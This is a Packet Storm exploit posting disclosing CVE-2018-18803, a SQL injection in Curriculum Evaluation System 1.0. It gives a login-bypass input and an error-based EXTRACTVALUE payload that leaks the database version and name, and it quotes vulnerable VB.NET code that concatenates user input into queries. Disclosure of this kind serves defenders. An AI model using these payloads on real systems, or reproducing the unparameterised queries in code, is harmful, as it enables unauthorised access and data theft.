Twenty Year Anniversary

Curriculum Evaluation System 1.0 SQL Injection

Curriculum Evaluation System 1.0 SQL Injection
Posted Oct 29, 2018
Authored by Ihsan Sencan

Curriculum Evaluation System version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2018-18803
MD5 | efa6d28975b76fa0d5d39916e71ac931

Curriculum Evaluation System 1.0 SQL Injection

Change Mirror Download
# Exploit Title: Curriculum Evaluation System 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/curriculumevaluationsystem_0.zip
# Version: 1.0
# Category: Windows
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18803

# POC:
# 1)
# User: 'or 1=1 or ''='
# ' AnD EXTRAcTVaLUE(22,CoNCaT(0x5c,veRSion(),(SElECT (ElT(1=1,1))),database()))-- Efe

# POC:
# 2)
# User: 'or 1=1 or ''='
# Pass: Null
#
# https://2.bp.blogspot.com/-4O0oZTFkzJE/W9Y4HWcImQI/AAAAAAAAEN4/5P-n-9H6JAQMiN6UpJu340xI4x_-MSjHACLcBGAs/s1600/sql5.png

#[PATH]/frmCourse.vb
#....
#47 Private Sub txtSearch_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
#48 sql = "Select * From tblcourse WHERE Course Like '%" & txtSearch.Text & "%'"
#49 reloadDtg(sql, dtglist)
#50 End Sub
#....

#[PATH]/includes/user.vb
#....
#05 Public Sub login(ByVal username As Object, ByVal pass As Object)
#06 Try
#07
#08 con.Open()
#09 reloadtxt("SELECT * FROM `tbluseraccount` WHERE User_name= '" & username & "' and Pass = sha1('" & pass & "')")
#10
#11
#12 If dt.Rows.Count > 0 Then
#13 If dt.Rows(0).Item("UserType") = "Administrator" Then
#14 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#15 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
#16 With Form1
#17 .tsAddG.Enabled = True
#18 .tsStudent.Enabled = True
#19 .tsCurriculum.Enabled = True
#20 .tsGrades.Enabled = True
#21 .tsReport.Enabled = True
#22 .tsUtilities.Enabled = True
#23 .tsSearchStudent.Enabled = True
#24 .tsLogin.Image = My.Resources.logout
#25 .tsLogin.Text = "Logout"
#26 End With
#27
#28
#29 LoginForm1.Close()
#30
#31
#32 ElseIf dt.Rows(0).Item("UserType") = "Faculty" Then
#33
#34 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#35 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
#36 With Form1
#37 .tsAddG.Enabled = True
#38 .tsStudent.Enabled = True
#39 .tsCurriculum.Enabled = True
#40 .tsGrades.Enabled = True
#41 .tsReport.Enabled = True
#42 .tsSearchStudent.Enabled = True
#43 .tsLogin.Image = My.Resources.logout
#44 .tsLogin.Text = "Logout"
#45 End With
#46
#47
#48
#49
#50 LoginForm1.Close()
#51
#52
#53
#54 ElseIf dt.Rows(0).Item("UserType") = "Assistant" Then
#55 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#56 'With Form1
#57 With Form1
#58 .tsAddG.Enabled = True
#59 .tsStudent.Enabled = True
#60 .tsCurriculum.Enabled = True
#61 .tsGrades.Enabled = True
#62 .tsReport.Enabled = True
#63
#64 .tsSearchStudent.Enabled = True
#65 .tsLogin.Image = My.Resources.logout
#66 .tsLogin.Text = "Logout"
#67 End With
#68
#69
#70 LoginForm1.Close()
#71 End If
#72
#73 'Form1.UserIdToolStripStatus.Text = dt.Rows(0).Item("UserId")
#74 'Form1.UserToolStripStatus.Text = dt.Rows(0).Item("Fullname")
#75 'Form1.StatusStrip1.Visible = True
#76 'inserting logs
#77 'sql = "INSERT INTO `tbllogs` (`UserId`, `LogDate`,LogMode) " & _
#78 ' " VALUES ('" & dt.Rows(0).Item("UserId") & "',Now(),'Logged in')"
#79 'create(sql)
#80
#81 Else
#82 MsgBox("Acount doest not exist!", MsgBoxStyle.Information)
#83 End If
#84 Catch ex As Exception
#85 MsgBox(ex.Message)
#86 End Try
#87 con.Close()
#88 da.Dispose()
#89 End Sub
#....


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    30 Files
  • 12
    Dec 12th
    25 Files
  • 13
    Dec 13th
    13 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close